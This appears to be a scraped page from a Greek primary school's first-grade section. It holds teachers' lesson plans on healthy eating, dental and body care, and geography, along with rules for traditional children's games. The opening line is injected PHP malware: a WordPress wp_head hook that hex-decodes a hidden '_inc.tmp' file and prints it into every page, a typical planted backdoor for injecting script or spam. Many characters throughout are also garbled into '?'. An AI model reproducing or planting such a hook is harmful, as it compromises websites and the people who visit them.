if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Α Τάξη |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Α Τάξη

ΤΣΑΚΩΝΙΚΑ ΠΑΡΑΜΥΘΙΑ

tsakonika_paramythiaΠαραμύθι_ Ο Ψαράς και η γυναίκα του Tsakonian Archives

Παίζουμε με τα συναισθήματα

Θεοδοσοπούλου Σοφία ΠΕ70
Σκαρπέλου Μαρία ΠΕ71
Αντωνόπουλος Παναγιώτης ΠΕ11
Τάξη Α
Τμήμα Α2
Σχ. έτος 2014-15

Γερά δοντάκια… καλύτερη υγεία!

Θεοδοσοπούλου Σοφία ΠΕ70
Ψαρολόγου Θωμαή ΠΕ70
Α τάξη
Σχ. έτος 2014-15

Φιλαναγνωσία

Θωμαή Ψαρολόγου ΠΕ70
Σχ. έτος: 2014-15
Τάξη Α’
Τμήμα Α1

Σχολικός Κήπος

Οι μαθητές της Α τάξης και της ΣΤ τάξης του σχολείου μας, θέλοντας να ομορφύνουν τον προαύλιο χώρο του σχολείου μας, αποφάσισαν να καθαρίσουν και να φυτέψουν νέα καλλωπιστικά φυτά στα παρτέρια του.

ΦΡΟΝΤΙΖΩ ΤΟΝ ΕΑΥΤΟ ΜΟΥ

ΤΑΞΗ : Α΄

ΣΧΟΛ. ΕΤΟΣ : 2013 – 2014

ΚΑΠΕΤΑΝΑΚΗ ΓΕΩΡΓΙΑ ΠΕ70

ΚΟΝΤΟΛΕΟΥ ΜΑΡΙΑ ΠΕ70

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

Γενικός σκοπός : Να συνειδητοποιήσουν οι μαθητές τον τρόπο και τη σημασία της φροντίδας της διατροφής τους, του σώματός τους και των δοντιών τους.

Ειδικοί στόχοι: 

  Α. Γνωρίζοντας και κατανοώντας

  • Να γνωρίσουν οι μαθητές ότι η τροφή δίνει την ενέργεια που χρειάζεται ο άνθρωπος για τις καθημερινές του δραστηριότητες.
  • Να γνωρίσουν ποιες τροφές είναι υγιεινές για τον ανθρώπινο οργανισμό και ποιες όχι.
  • Να κατανοήσουν τη σημασία της τροφικής πυραμίδας και τις ομάδες τροφίμων.
  • Να κατανοήσουν τη σημασία της σωματικής άσκησης.
  • Να κατανοήσουν σε γενικές γραμμές τη λειτουργία του πεπτικού συστήματος.
  • Να γνωρίσουν τα στοιχεία που παίρνουμε από διάφορες τροφές.
  • Γνωριμία με την παρασκευή του ψωμιού.
  • Να συνειδητοποιήσουν τη σημασία της περιποίησης των δοντιών μας.
  • Να γνωρίσουν μερικές ασθένειες των δοντιών μας.
  • Να μάθουν το σωστό τρόπο πλυσίματος των δοντιών.
  • Να γνωρίσουν τα μέρη του σώματός τους.
  • Να κατανοήσουν τη σημασία της περιποίησης του σώματός τους.

Β. Ερευνώντας και εντοπίζοντας

  • Να καταστούν οι μαθητές ικανοί να συντάξουν ημερολόγιο για την καθημερινή τους διατροφή και να συνειδητοποιήσουν αν είναι σωστές οι διατροφικές τους συνήθειες.
  • Να καταστούν οι μαθητές ικανοί να δημιουργήσουν ένα πρόγραμμα διατροφής για το δεκατιανό τους στο σχολείο.
  • Να έρθουν σε επαφή με την οδοντοστοιχία τους.
  • Να έρθουν σε επαφή με το χώρο του οδοντιατρείου, να διατυπώσουν τυχόν απορίες τους και να καταλήξουν σε συμπεράσματα.

Γ. Επικοινωνία και συνεργασία με άλλους

  • Επίσκεψη στο σούπερ μάρκετ, το φούρνο και το μανάβικο της γειτονιάς μας και παρατήρηση διάφορων προϊόντων.
  • Επίσκεψη στον οδοντίατρο (ή επίσκεψη του οδοντίατρου στο σχολείο).

Δ. Σύνδεση με τη ζωή

  • Να προσπαθήσουν να εντάξουν στην καθημερινή τους ζωή μία υγιεινότερη διατροφή.
  • Να γίνει στους μαθητές συνήθεια το πλύσιμο των δοντιών μετά από κάθε γεύμα και κυρίως μετά από κάθε γλύκισμα.

Εκτιμώμενη χρονική διάρκεια: 3 μήνες (Ιανουάριος- Φεβρουάριος – Μάρτιος)

Είδος διδακτικής πρακτικής   Ομαδοσυνεργατική , εποικοδομητική προσέγγιση, παιχνίδι ρόλων, μαιευτική, ιδεοθύελλα, συζήτηση, δερευνητική, χρήση ΤΠΕ.

Εκπαιδευτικό υλικό   Internet, χαρτί, χαρτόνι, εικόνες τροφίμων, παραμύθια, φρούτα.

Προαπαιτούμενη γνώση   Να έχουν οι μαθητές στο μυαλό τους ποικιλία τροφίμων.

Το επιστημονικό περιεχόμενο   Η σημασία της διατροφής και της περιποίησης των δοντιών και του σώματος για την υγειά του ανθρώπου.

Δραστηριότητα 1: Σε ένα φύλλο Α3 σχεδιάζουμε ένα ιδεόγραμμα το οποίο συμπληρώνουμε με τις ιδέες που θα διατυπώσουν οι μαθητές στην ερώτηση: «Όταν ακούτε τη φράση υγιεινή διατροφή, τι σας έρχεται στο μυαλό;».

Δ2: Παιχνίδι με καρτέλες. Οι καρτέλες περιέχουν εικόνες με δραστηριότητες και εικόνες με τρόφιμα (ευεργετικά ή μη για την υγεία του ανθρώπου). Οι μαθητές επιλέγουν δραστηριότητες κι έπειτα πρέπει να βρουν τη σωστή  τροφή που θα τους δώσει ενέργεια για να τις πραγματοποιήσουν. Στο τέλος συμπληρώνουμε το φύλλο εργασίας 1.

Δ3 : Οι μαθητές συμπληρώνουν ένα ημερολόγιο πρόγραμμα στο οποίο θα αναφέρουν τα φαγητά που θα καταναλώσουν στο χρονικό διάστημα μιας εβδομάδας. Στο τέλος της εβδομάδας παρουσιάζουν τα αποτελέσματα στους συμμαθητές τους και ακολουθεί συζήτηση σχετικά με τις διατροφικές τους συνήθειες.

Δ4: Τα παιδιά κατασκευάζουν τη δική τους διατροφική πυραμίδα εκφράζοντας ανεπηρέαστα την άποψή τους για το ποιες τροφές πρέπει να καταναλώνουμε περισσότερο και ποιες λιγότερο. Συμπληρώνουν το φύλλο εργασίας 4.

Δ5: Κατασκευή της διατροφικής πυραμίδας με χαρτόνι και διαχωρισμός των ομάδων τροφίμων. Οι μαθητές θα κολλήσουν πάνω στην πυραμίδα σαν κολάζ, εικόνες από διάφορα τρόφιμα ή εικόνες από έντυπο υλικό που θα φέρουν οι ίδιοι ξεχωρίζοντας τα τρόφιμα στις ομάδες τους. Στο πλάι της πυραμίδας θα ζωγραφίσουν εικόνες με δραστηριότητες για να συνδέσουμε την υγιεινή διατροφή με την άσκηση.

Δ6 :  Συμπληρωματική της δραστηριότητας 5. Τα παιδιά σε πλαστικό πιατάκι ή χαρτόνι προτείνουν «το πιάτο της ημέρας» με βάση μια ισορροπημένη διατροφή κολλώντας εικόνες ή ζωγραφίζοντας τις τροφές. Αποφασίζουμε από κοινού να προσαρμόσουμε το δεκατιανό μας στα πρότυπα της υγιεινής διατροφής.

Διαβάζουμε από το ανθολόγιο το κείμενο: «Μια φορά ήταν …… η κολοτούμπα» και κατασκευάζουμε το χέρι με τις ομάδες τροφίμων.

Δ7: Επίσκεψη διατροφολόγου στο σχολείο.

Δ7α : Ζωγραφίζουμε πάνω σε αληθινά φρούτα, λαχανικά, δημητριακά, όσπρια τους δίνουμε πρόσωπο και λαλιά, προσωποποιούμε ζώα από τα οποία παίρνουμε διάφορα προϊόντα και παίζουμε ένα μικρό θεατρικό δρώμενο παρουσιάζοντας τη θρεπτική αξία διάφορων τροφίμων. Παιχνίδι: Με κλειστά μάτια και την αίσθηση της αφής μαντεύω ποιο φρούτο ή λαχανικό είναι. Παιχνίδι: με κλειστά τα μάτια προσπαθούν οι μαθητές να μαντέψουν ποιο φρούτο ή λαχανικό κτλ είναι.

Δ8: Διαβάζουμε παραμύθια ? βιβλία, ακούμε τραγούδια σχετικά με το θέμα και διασκεδάζουμε.

  1. Από το στάρι στο ψωμί
  2. Το ξωτικό που ήθελε να ψηλώσει
  3. Ο κύριος Κιουκ έχει λόξιγκα
  4. Το φαγητό δεν είναι μόνο για να χορταίνουμε.
  5. Το χοντρό μπιζέλι
  6. Φρούτα φρουτ
  7. Τόσο λάθος διατροφή
  8. Μίλα μου για μήλα
  9. Το καρότο και η αγκινάρα

Δ9 : Σχεδιάζουμε το περίγραμμα ενός μαθητή σε χαρτί του μέτρου και κολλάμε πάνω τα όργανα του πεπτικού μας συστήματος τα οποία έχουμε εκτυπώσει σε χαρτί Α4 ή Α3, αφού πρώτα παρακολουθήσουμε το βίντεο: « Μια φορά ήταν η ζωή ? η πέψη» με τη βοήθεια του youtube. (http://www.youtube.com/watch?v=FiQ4M4ESuUU)

Τα δόντια

  Δ1: Με τη βοήθεια ενός καθρέφτη μετράμε και παρατηρούμε τα δόντια μας.

Δ2 : Παρακολουθούμε σχετικό βίντεο: « Μια φορά ήταν η ζωή ? τα δόντια» (http://www.youtube.com/watch?v=sAt1j_p824g) και συζητάμε ό,τι είδαμε.

Δ3: Παρακολουθούμε σχετικό βίντεο κινουμένων σχεδίων «Ο Ντάντλι επισκέπτεται τον οδοντίατρο»(youtube), και  «www.healthyteeth.org». Ακολουθεί συζήτηση και διεξαγωγή συμπερασμάτων.

Δ4: Επίσκεψη οδοντίατρου στο σχολικό χώρο.

Δ4 α: Μαθαίνω να πλένω σωστά τα δόντια μου.

Δ5: Διαβάζουμε σχετικά παραμύθια: «Η Δόνα Τερηδόνα» , «Ο Ιππόλυτος ο Ιπποπόταμος»

Καθαρό σώμα

Δ1 : Σε χαρτί του μέτρου σχεδιάζουμε το περίγραμμα ενός μαθητή και γράφουμε πάνω οδηγίες για το πώς πρέπει να διατηρούμε καθαρό το σώμα μας, τα βασικά όργανα του πεπτικού συστήματος και τα μέρη του σώματος.

Δ2 : Ακούμε τραγούδια για το σώμα μας. (Ζουζούνια ? Κεφάλι , ώμοι , γόνατα και δάχτυλα, Τραγουδάμε για το ένα, Χαρωπά τα δυο μου χέρια τα χτυπώ)

Αξιολόγηση: Κατά τη διάρκεια εκτέλεσης του διδακτικού σεναρίου οι μαθητές συμμετείχαν ενεργά. Πολλοί μαθητές υιοθέτησαν τον υγιεινό τρόπο διατροφής κάνοντας εφαρμογή στο καθημερινό δεκατιανό που έφερναν στο σχολείο.

Βιβλιογραφία:   Ανθολόγιο , «Μια φορά ήταν ……. η κολοτούμπα», σελ. 65 Ο κύριος Κιουκ έχει λόξιγκα, Μαρία Ρουσάκη Το φαγητό δεν είναι μόνο για να χορταίνουμε, Ελένη Χαρατσή ? Γιωτάκη Από το στάρι στο ψωμί, Ελένη Σβορώνου Το ξωτικό που ήθελε να ψηλώσει, Καλλιόπη Εμμανουηλίδου

ΤΑ ΠΑΙΧΝΙΔΙΑ ΑΛΛΟΤΕ ΚΑΙ ΣΗΜΕΡΑ

ΤΑ ΠΑΙΧΝΙΔΙΑ ΑΛΛΟΤΕ ΚΑΙ ΣΗΜΕΡΑ
Α΄ ΔΗΜΟΤΙΚΟΥ
ΕΚΠ/ΚΟΙ: ΚΟΝΤΟΛΕΟΥ ΜΑΡΙΑ ? ΚΑΠΕΤΑΝΑΚΗ ΓΕΩΡΓΙΑ
ΣΧΟΛΙΚΟ ΕΤΟΣ: 2013-2014

Η αγάπη των παιδιών για το παιχνίδι είναι διαχρονική και προέρχεται από την εσωτερική ανάγκη του παιδιού για δράση, κίνηση και ζωή. Μέσα από το παιχνίδι διαμορφώνεται ο χαρακτήρας του παιδιού, καθώς αυτό αντιλαμβάνεται σταδιακά την αναγκαιότητα πειθαρχίας στους κανόνες του κάθε παιχνιδιού, την ανάγκη συνεργασίας με τους συμπαίκτες και κατ? επέκταση τη μείωση του εγωκεντρισμού, την ανάγκη ανάπτυξης στρατηγικών για να οδηγηθεί στη νίκη αλλά και την αποδοχή της ήττας. Τα παραδοσιακά παιχνίδια δίνουν στο παιδί τη δυνατότητα να έρθει σε επαφή με την ύπαιθρο και το χώμα, να χρησιμοποιήσει απλά υλικά (πέτρες, ξυλάκια) και να αναπτύξει τη φαντασία του.

Μέσα από το παιχνίδι γίνεται:

  1. ? άσκηση της αντιληπτικής ικανότητας,
  2. ? της κινητικής ικανότητας,
  3. ? της μυϊκής δύναμης,
  4. ? καλλιέργεια της συνδυασμένης κίνησης ματιού και χεριού,
  5. ? της γρήγορης αντίδρασης,
  6. ? της αυτοσυγκέντρωσης, της προσοχής,
  7. ? της κινητικής ετοιμότητας,
  8. ? η ανάπτυξη ψυχικών αρετών (θάρρος, αυτοπεποίθηση, παρατηρητικότητα, πειθαρχία, υπομονή)

ΣΤΟΧΟΙ:

  • l Να γνωρίσουν και να παίξουν οι μαθητές παραδοσιακά παιχνίδια / επιτραπέζια / παιχνίδια γνώσεων.
  • l Να γνωρίσουν παιχνίδια της αρχαιότητας /των παππούδων τους
  • lΝα συνειδητοποιήσουν τη διαχρονική ανάγκη των παιδιών για παιχνίδι και την ανάγκη εφαρμογής κανόνων.
  • l Κατανόηση συναισθημάτων στη διάρκεια του παιχνιδιού.

Τα παιχνίδια που καταγράψαμε και παίξαμε είναι:
1. Κρυφτό
2. Τυφλόμυγα
3. Τσουβαλοδρομίες
4. Πατώ
5. Μπιζζ
6. Περνά ?περνά η μέλισσα
7. Πετάει ?πετάει
8. Πού είναι το δαχτυλίδι
9. Χαλασμένο τηλέφωνο
10. Αλάτι χοντρό ?αλάτι ψιλό
11. Ο βασιλιάς
12. Κλέφτες κι αστυνόμοι
13. Η κολοκυθιά
14. Η κρεμάλα
15. Το μαντιλάκι
16. Τα μήλα
17. Ο λύκος και τα αυγά
18. Αλλαγές
19. Αγαλματάκια

Κρυφτό
Παίζεται από δύο ή περισσότερα παιδιά σε χώρο με πολλές κρυψώνες πχ αυλή, κήπος κλπ.
Γίνεται κλήρωση (συχνά λέγοντας ένα τραγουδάκι όπως το α μπε μπα μπλομ?) για να βγει ο παίκτης που θα τα φυλάει, δηλαδή που θα μετρήσει μέχρι κάποιον αριθμό με κλειστά τα μάτια. Όση ώρα αυτός τα φυλάει, οι άλλοι παίκτες κρύβονται. Όταν τελειώσει το μέτρημα, αυτός που τα φυλάει προσπαθεί να βρει τους συμπαίκτες του. Μόλις βρει κάποιον τα φυλάει αυτός.

Τυφλόμυγα
Παίζεται από αρκετά παιδιά. Στην αρχή γίνεται κλήρωση για να δουν ποιος θα τα φυλάει. Αυτός κλείνει τα μάτια του με ένα μαντήλι και τα άλλα παιδιά ανακατεύονται αλλάζοντας θέσεις. Μετά η τυφλόμυγα προσπαθεί να πιάσει ένα παιδί και να βρει πώς το λένε. Αν το αναγνωρίσει, τότε αυτό το παιδί θα κάνει την τυφλόμυγα κι έτσι συνεχίζεται το παιχνίδι.

Τσουβαλοδρομίες
Οι παίκτες μπαίνουν μέσα σε τσουβάλια που τους φτάνουν μέχρι τη μέση περίπου και κάνουν αγώνα δρόμου. Νικητής είναι αυτός που θα φτάσει πρώτος στο τέρμα.

Το μπιζζζ!
Τα παιδιά αποφασίζουν ποιος θα τα φυλάει. Αυτός κλείνει τα μάτια του με το αριστερό του χέρι και το δεξί του χέρι το βάζει κάτω από την αριστερή του μασχάλη με την παλάμη ανοιχτή προς τα πάνω. Οι άλλοι παίκτες στέκονται πίσω του κι ένα παιδί τον χτυπά ελαφρά στην ανοιχτή παλάμη. Μετά αυτό το παιδί ανακατεύεται με τους υπόλοιπους παίκτες κι όλοι μαζί φωνάζουν «Μπιζζζ» κουνώντας το δεξί χέρι τους με υψωμένο το δείκτη. Αυτός που τα φυλάει πρέπει να μαντέψει ποιος τον χτύπησε. Αν τον ανακαλύψει παίρνει τη θέση του, αλλιώς τα ξαναφυλάει.

 

Περνά, περνά η μέλισσα
Δύο παιδιά χτυπούν παλαμάκια και τραγουδούν:
Περνά ? περνά η μέλισσα
με τα μελισσόπουλα
και με τα παιδόπουλα.
Τα άλλα παιδιά περνούν κάτω από τα χέρια τους. Όταν τελειώσουν το τραγούδι πιάνουν το παιδί που περνά εκείνη τη στιγμή και το βάζουν να επιλέξει με ποια ομάδα θα πάει. Στο τέλος οι δύο ομάδες τραβούν η μια την άλλη και όποια δεν πέσει κάτω είναι η νικήτρια.

Πετάει-Πετάει
Παίζεται με δύο παίκτες. Ο ένας παίκτης κουνάει τα δάχτυλά του πάνω κάτω και λέει «πετάει, πετάει?» προσθέτοντας το όνομα ενός ζώου ή πράγματος. Αν αυτό πετάει πρέπει να έχουν και οι δύο πάνω το δάχτυλό τους. Αν ο συμπαίκτης το έχει κάτω, χάνει και λέει αυτός το «πετάει, πετάει?»

 

Πού είναι το δαχτυλίδι

Κάποιο παιδί κρύβει ανάμεσα στα χέρια του ένα δαχτυλίδι, ενώ τα άλλα κάθονται σε σειρά. Κατόπιν προσπαθεί να αφήσει το δαχτυλίδι στα χέρια κάποιου άλλου παιδιού λέγοντας το τραγουδάκι:

Πουν’ το, πουν’ το
το δαχτυλίδι,
ψάξε, ψάξε
δεν θα το βρεις!
δεν θα το βρεις,
δεν θα το βρεις,
το δαχτυλίδι που ζητείς.
Τα παιδιά προσπαθούν να μαντέψουν ποιος έχει το δαχτυλίδι κάνοντας μόνο μία μαντεψιά. Αν κάποιος μαντέψει σωστά παίρνει αυτός το δαχτυλίδι και συνεχίζεται το παιχνίδι.

Χαλασμένο τηλέφωνο
Τα παιδιά κάθονται σε σειρά ή σε κύκλο. Το πρώτο παιδί λέει γρήγορα στο αυτί του διπλανού του μια δύσκολη λέξη. Ο δεύτερος την λέει στο αυτί του επόμενου κλπ. Ο τελευταίος λέει τη λέξη δυνατά κι αν την πει σωστά τότε ο πρώτος κερδίζει.

Αλάτι χονδρό-αλάτι ψιλό
Στην αρχή τα παιδιά κάνουν κλήρωση για να βγάλουν τη μάνα. Ύστερα κάθονται οκλαδόν σε κύκλο με τα χέρια πίσω. Η μάνα είναι έξω από τον κύκλο και κρατά ένα μαντίλι. Γυρίζει γύρω από τον κύκλο τραγουδώντας:
Αλάτι ψιλό, αλάτι χονδρό,
έχασα τη μάνα μου και πάω να τη βρω
παπούτσια δεν μου πήρε να πάω στο χορό.
Όσο τραγουδάει αφήνει πίσω από ένα παιδί το μαντίλι. Τότε αυτό σηκώνεται κι αρχίζει να κυνηγάει τη μάνα. Όταν την πιάσει, η μάνα κάθεται στη θέση του και αυτό το παιδί παίρνει τη θέση της και γίνεται μάνα.

Ο Βασιλιάς
Αφού τα βγάλουν τα παιδιά, ένα γίνεται βασιλιάς. Τα άλλα πηγαίνουν λίγο πιο πέρα και διαλέγουν κάποιο επάγγελμα για να το παραστήσουν με κινήσεις. Έπειτα πλησιάζουν το βασιλιά και ακολουθεί ο παρακάτω διάλογος:
– Βασιλιά, βασιλιά με τα 12 σπαθιά, τι δουλειά;
– Τεμπελιά!
– Και τα ρέστα;
– Παγωτά.
– Είπε η γιαγιά να μας κάνεις μια δουλειά.
– Τι δουλειά;
Τότε τα παιδιά μιμούνται το επάγγελμα που διάλεξαν. Αν ο βασιλιάς το καταλάβει, το λέει και κυνηγά να πιάσει κάποιο παιδί που γίνεται βασιλιάς στον επόμενο γύρω. Αν δεν το καταλάβει, τα παιδιά μιμούνται κάποιο άλλο επάγγελμα.

Κλέφτες και αστυνόμοι
Τα παιδιά χωρίζονται σε δύο ομάδες. Η μικρότερη ομάδα είναι οι αστυνόμοι και η άλλη ομάδα είναι οι κλέφτες. Τα παιδιά ξεκινούν το κυνηγητό. Αν οι κλέφτες θέλουν να ξεκουραστούν πηγαίνουν σε ένα συγκεκριμένο σημείο κι εκεί οι αστυνόμοι δεν μπορούν να τους πιάσουν. Όταν ένας αστυνόμος πιάσει έναν κλέφτη τον οδηγεί στη φυλακή. Ο φυλακισμένος κλέφτης ελευθερώνεται αν τον ακουμπήσει άλλος κλέφτης και φωνάξει «ξελέ». Το παιχνίδι τελειώνει, όταν φυλακιστούν όλοι οι κλέφτες.

Η κολοκυθιά
Κάθε παιδί έχει έναν αριθμό 1, 2, 3, ? Το παιδί που έχει το 1 αρχίζει λέγοντας: «Στου παππού το περιβόλι, που το αγαπούμε όλοι, είναι μια κολοκυθιά, πλάι-πλάι στη ροδιά. Κάνει πέντε κολοκύθια στρογγυλά, μα την αλήθεια θα τα δώσει ο παππούς μποναμά της αλεπούς. Δυο θα δέσει στην ουρά της κι όλα τα άλλα στα παιδιά της». Μετά ρωτάει: «Ποιος θα πάει στην αλεπού; Να πάει ο αριθμός ?» Το παιδί που έχει εκείνο τον αριθμό λέει: «Γιατί να πάει το ???; Να πάει το ?..», προτείνοντας κάποιον άλλο αριθμό. Αν κάποιο παιδί απαντήσει χωρίς να είναι ο αριθμός του, χάνει και μιμείται κάποιο ζώο που έχει ορίσει η ομάδα.

Η κρεμάλα
Παίζεται με δύο ή περισσότερους παίκτες. Παίρνουμε μια σελίδα από χαρτί και γράφουμε τα γράμματα της αλφαβήτας. Στο πάνω μέρος ζωγραφίζουμε μια κρεμάλα και στο κάτω μέρος γράφουμε τη λέξη βάζοντας μόνο το πρώτο και το τελευταίο γράμμα της, ενώ για τα άλλα γράμματα βάζουμε παύλες. Ο αντίπαλος λέει ένα γράμμα. Αν το γράμμα ανήκει στη λέξη το γράφουμε πάνω στις παύλες, αλλιώς το διαγράφουμε από την αλφαβήτα και ζωγραφίζουμε ένα κεφάλι στην κρεμάλα. Το παιχνίδι συνεχίζεται μέχρι ο αντίπαλος να βρει τη λέξη. Αν ζωγραφίσουμε όλα τα σημεία του σώματος και ο αντίπαλος δεν έχει βρει τη λέξη, χάνει και καίγεται.

Το μαντιλάκι
Με μια κιμωλία σχεδιάζουμε έναν κύκλο στη μέση και δύο γραμμές, μία δεξιά και μία αριστερά. Τα παιδιά χωρίζονται σε δύο ομάδες. Κάθε παιδί από τις δύο ομάδες έχει έναν αριθμό. Βάζουν το μαντίλι στο κέντρο του κύκλου και τα παιδιά που έχουν τον ίδιο αριθμό προσπαθούν να πάρουν το μαντίλι χωρίς να τους πιάσει ο αντίπαλος. Αν πάρουν το μαντίλι, παίρνουν ένα πόντο. Αν τους πιάσει ο αντίπαλος, παίρνει αυτός τον πόντο. Νικήτρια είναι η ομάδα που έχει τους περισσότερους πόντους.

Τα μήλα
Δύο παίκτες κάθονται στα τέρματα σε απόσταση περίπου 3-5 μέτρων μεταξύ τους και τα υπόλοιπα στο κέντρο. Τα παιδιά που είναι στα τέρματα ρίχνουν την μπάλα προσπαθώντας σαν πετύχουν κάποιο από τα παιδιά που είναι στο κέντρο. Αν το πετύχουν αυτό βγαίνει έξω. Αν κάποιο από τα παιδιά του κέντρου πιάσει την μπάλα χωρίς αυτή να έχει χτυπήσει προηγουμένως κάτω, έχει ένα μήλο δηλαδή μία επιπλέον ζωή. Τα παιδιά του κέντρου τρέχουν από το ένα άκρο στο άλλο για να μη χτυπηθούν από την μπάλα. Αν μείνει ένα παιδί στο κέντρο τότε θα χτυπηθούν 12 μπαλιές κι αν δεν το πετύχουν ξαναμπαίνουν όλοι οι παίκτες μέσα με τα ίδια τέρματα, ενώ αν το πετύχουν το παιχνίδι ξαναρχίζει με διαφορετικούς παίκτες στα τέρματα.

Ο λύκος και τ? αυγά
Ένα παιδί κάνει το λύκο, ένα άλλο τη μάνα και τα υπόλοιπα τα αυγά. Η μάνα περνάει από τα αυγά και κάθε αυγό της λέει σιγανά στο αυτί ένα χρώμα. Μετά η μάνα λέει στο λύκο ανακατεμένα τα χρώματα κι αυτός διαλέγει ένα χρώμα. Το παιδί που έχει αυτό το χρώμα βγαίνει από το χώρο που είναι συγκεντρωμένα τα αυγά και ο λύκος αρχίζει να το κυνηγά. Αν το πιάσει, το βάζει στη φυλακή. Η μάνα λέει ξανά τα χρώματα, ο λύκος διαλέγει ένα και το παιχνίδι συνεχίζεται. Αν ο λύκος στο τέλος πιάσει όλα τα αυγά, κερδίζει εκείνος, αλλιώς χάνει.

Αλλαγές
Τα παιδιά αφήνουν στο χώρο ξυλαράκια. Γίνεται κλήρωση κι ένα παιδί βγαίνει έξω. Τα άλλα παιδιά κάθονται πάνω στα ξυλαράκια τους. Το παιδί που βγήκε φωνάζει «αλλαγή». Τότε τα παιδιά τρέχουν να σταθούν μπροστά σε διαφορετικό ξυλαράκι ενώ το παιδί που είναι έξω τα κυνηγά. Αν πιάσει κάποιο παιδί, παίρνει τη θέση του και το παιχνίδι συνεχίζεται.

Σχοινάκι
Δύο παιδιά γυρίζουν το σχοινάκι με σταθερό ρυθμό και τα άλλα πηδούν μέσα στο σχοινάκι. Όποιο παιδί μπερδευτεί χάνει και βγαίνει έξω.

Τα αγάλματα
Ένα παιδί γυρίζει στον τοίχο και λέει: «Αγαλματάκια ακούνητα, αμίλητα, αγέλαστα, μέρα ή νύχτα;» Τα άλλα παιδιά προσπαθούν να πάρουν τη στάση ενός αγάλματος κι αν είναι έτοιμα απαντούν «μέρα», αλλιώς απαντούν «νύχτα». Όταν το παιδί που τα φυλάει γυρίσει, τα άλλα παιδιά προσπαθούν να μείνουν εντελώς ακίνητα. Όποιο κουνηθεί, χάνει. Νικητής είναι αυτός που θα μείνει ακίνητος μέχρι το τέλος.

Τρόποι χωρισμού των ομάδων ? επιλογή της μάνας

  • Δύο παίκτες στέκονται ο ένας απέναντι από τον άλλο σε απόσταση κάποιων μέτρων. Ύστερα αρχίζουν να προχωρούν, βάζοντας το ένα πόδι μπροστά από το άλλο. Όταν πλησιάσουν εκείνος που θα πατήσει το πόδι του άλλου, παίζει πρώτος.
  • Τα παιδιά τα βγάζουν λέγοντας κάποιο ποιηματάκι πχ. Α μπε μπα μπλομ ?. ή έχω ένα αυτοκινητάκι ?.. ή άκατα μάκατα?.

ΕΠΙΤΡΑΠΕΖΙΑ ΠΑΙΧΝΙΔΙΑ
Δημιουργία παιχνιδιού «Βρίσκω τη λέξη»
Φτιάχνουμε κάρτες 10Χ5. Στην πίσω πλευρά γράφουμε μια λέξη και αποκάτω 4 λέξεις τις οποίες απαγορεύεται ο αναγνώστης να πει στους συμπαίκτες του όταν τους ζητά να βρουν την κρυμμένη λέξη. Φτιάχνουμε σε συνεργασία με τους μαθητές τους κανόνες του παιχνιδιού:
1. Οι ομάδες έχουν 1 λεπτό για να βρουν την κρυμμένη λέξη.
2. Ο αναγνώστης δεν μπορεί να βοηθήσει τους συμπαίκτες του με παντομίμα.
3. Δεν μπορεί να χρησιμοποιήσει τις απαγορευμένες λέξεις αλλά ούτε και λέξεις που ανήκουν στην ίδια οικογένεια λέξεων με τις απαγορευμένες.
4. Οι παίκτες μπορούν να πουν πολλές λέξεις μέχρι να βρουν την κρυμμένη.

Δημιουργία παιχνιδιού «Φτιάχνω τη λέξη»
Η κάθε ομάδα παίρνει 10 μικρά τετράγωνα μαγνητάκια που υπάρχουν στην τάξη και στη μία πλευρά τους έχουν κάποιο γράμμα της αλφαβήτας και με αυτά προσπαθεί να φτιάξει κάποια λέξη. Μπορεί να χρησιμοποιήσει όσα γράμματα θέλει. Όταν φτιάξει τη λέξη, τη βάζει στο μαγνητοπίνακα και παίρνει τόσα γράμματα όσα χρησιμοποίησε. Μετά συνεχίζει η επόμενη ομάδα. Για κάθε λέξη παίρνουν τόσους πόντους όσα και τα γράμματα της λέξης. Νικήτρια είναι η ομάδα που μάζεψε τους περισσότερους πόντους.

Σχολικό Έτος 2012-2013


Έναρξη σχολικού έτους 2012-2013


Διδακτικό σενάριο

στη Μελέτη Περιβάλλοντος

για την Α΄ Τάξη

Εκπαιδευτικοί:  Χαρμπαλή Σοφιά – Μαρνέρης Αλέξανδρος

3η Ενότητα (Γεωγραφία):

 

«Η ζωή γύρω μας»

 

Θεματικές ενότητες

 

3.1 Που είναι κτισμένο το χωριό/συνοικία/πόλη μου;

3.2  Τι  καιρό κάνει στον τόπο μου;

3.3  Πώς μετακινούμαστε;

 

 

 

 

 

 

 

Προσδοκώμενα μαθησιακά αποτελέσματα

  • ? Σκοπός:   Οι μαθητές να είναι ικανοί να αποδίδουν με εικονιστικό και λεκτικό τρόπο διαφορετικούς τόπους και να ταυτοποιούν τόπους με δραστηριότητες και ασχολίες των κατοίκων του τόπου.

 

  • Ειδικοί στόχοι
  • Γνωρίζοντας & Κατανοώντας

 

Οι μαθητές να είναι ικανοί να:

?     Περιγράφουν τα γεωμορφολογικά χαρακτηριστικά και τις καιρικές συνθήκες του τόπου που ζουν.

?     Αναγνωρίζουν βασικούς γεωγραφικούς όρους (βουνό, πεδιάδα, ποτάμι, λίμνη, θάλασσα) με βάση τα συγκεκριμένα στοιχεία του τόπου τους.

?     Συγκρίνουν το δικό τους τόπο με άλλους τόπους διαφορετικούς και βρίσκουν ομοιότητες και διαφορές.

?     Αναγνωρίζουν τα μέσα συγκοινωνίας  και  να αναφέρουν τη χρησιμότητά τους.

 

  • Διερευνώντας

 

Οι μαθητές να είναι ικανοί να:

?   Αναγνωρίζουν τις επεμβάσεις των ανθρώπων στο φυσικό περιβάλλον του τόπου τους.

?   Διερευνούν τις  καιρικές μεταβολές στο άμεσο περιβάλλον τους και πως    αυτές επηρεάζουν τη ζωή των ανθρώπων (π.χ. ενδυμασία).

 

  • Επικοινωνώντας

 

Οι μαθητές να είναι ικανοί να:

?     Επικοινωνούν και να μοιράζονται ιδέες, σκέψεις και συναισθήματα.

?     Συνεργάζονται προκειμένου να αναπτύξουν δεξιότητες.

?     Συνεργάζονται προκειμένου να παράγουν έργο.

 

 

 

  • Συνδέοντας

 

Οι μαθητές να είναι ικανοί να:

?     Παράγουν έργα (ερευνητικά, καλλιτεχνικά, κατασκευαστικά).

?     Συσχετίζουν τα γεωμορφολογικά χαρακτηριστικά με τη ζωή και τις δραστηριότητες των ανθρώπων.

?     Συνδέουν τις επεμβάσεις των ανθρώπων στο φυσικό περιβάλλον του τόπου τους με τις συνέπειες που έχουν για τη ζωή του ανθρώπου.

